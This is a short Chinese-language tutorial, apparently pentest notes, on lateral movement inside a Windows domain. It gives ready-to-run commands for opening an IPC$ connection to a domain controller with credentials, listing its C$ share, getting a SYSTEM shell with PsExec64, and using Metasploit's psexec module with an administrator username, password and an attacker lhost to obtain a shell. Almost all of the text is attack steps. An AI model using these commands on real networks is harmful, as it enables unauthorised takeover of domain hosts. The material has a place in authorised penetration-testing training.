• 域内横向移动是指,攻击者以攻陷的系统为跳板,访问其他域内主机,扩大攻击战果
Windows远程连接
• IPC(Internet Process Connection)指进程间通信开放的命名管道
• IPC可以通过验证用户名和密码获得相应权限,比如远程管理计算机和查看共享资源
• 通过ipc$,可以与目标机器建立连接,利用这个连接,可以访问目标机器的文件、上传、下载以及运行命令等
建立IPC$
net use \\域控ip\ipc$ /user:用户名 密码
建立ipc
查看建立的连接
net use
查看建立的连接
访问远程文件
dir \\域控ip\c$
查看目录
使用PsExec64脚本反弹shell
1)先将脚本复制到攻击机
复制脚本
2)在脚本所在文件夹打开cmd,并执行以下命令
PsExec64.exe \\域控ip -s cmd.exe
等待连接
3)等待连接完成,返回shell
连接完成
msf中的psexec模块
1、进入msf
msfconsole
进入msf
2、搜索psexec模块
search psexec
搜索模块
3、使用模块并查看参数设置
use 4
show options
查看参数设置
4、设置参数并执行
set rhosts 域控ip
set lhost 攻击机内网ip
set smbuser administrator
set smbpass 密码
run
设置参数并执行
5、返回shell
返回shell
